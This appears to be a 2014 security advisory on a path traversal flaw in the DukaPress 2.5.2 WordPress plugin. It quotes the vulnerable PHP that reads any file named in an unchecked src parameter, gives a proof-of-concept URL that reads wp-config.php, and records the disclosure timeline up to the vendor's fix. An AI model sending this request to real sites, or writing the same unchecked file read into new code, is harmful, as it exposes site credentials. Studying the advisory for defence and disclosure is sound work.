13-11-2014 / Vulnerabilities

DukaPress 2.5.2 Path Traversal

File: dukapress\lib\dp_image.php

if (!function_exists('add_action')) {
    require_once('../../../../wp-load.php');
}
echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));

_dp_imgresize returns given $img_url param if $width and $height (in our case _$REQUEST['w'] and _$REQUEST['h']) doesn't exist.

File: dukapress\php\dp-functions.php

function dp_img_resize($attach_id = null, $img_url = null, $width, $height, $crop = true){
	if($width && $height){
		// I skip unnecessary lines
		}
		return $image_src[0];
	}else{
		return $img_url;
	}	
}

So we can display any file passing only src parameter.

Proof of Concept

http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php

Timeline

27-10-2014: Discovered
11-11-2014: Vendor notified
12-11-2014: Version 2.5.4 released, issue resolved

Vulnerabilities

Kallithea <= 0.3.4 Incorrect access control and XSS

This vulnerability allows a normal user to modify the permissions of repositories that he normally shouldn’t have access to.

12-12-2018

2 MIN READ

Vulnerabilities

Gitea 1.4.0 Unauthenticated Remote Code Execution

This is part 1 of 3 about bugs inside Gitea

05-07-2018

5 MIN READ

Vulnerabilities

ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution

How to create a Metasploit module in example?

28-06-2018

1 MIN READ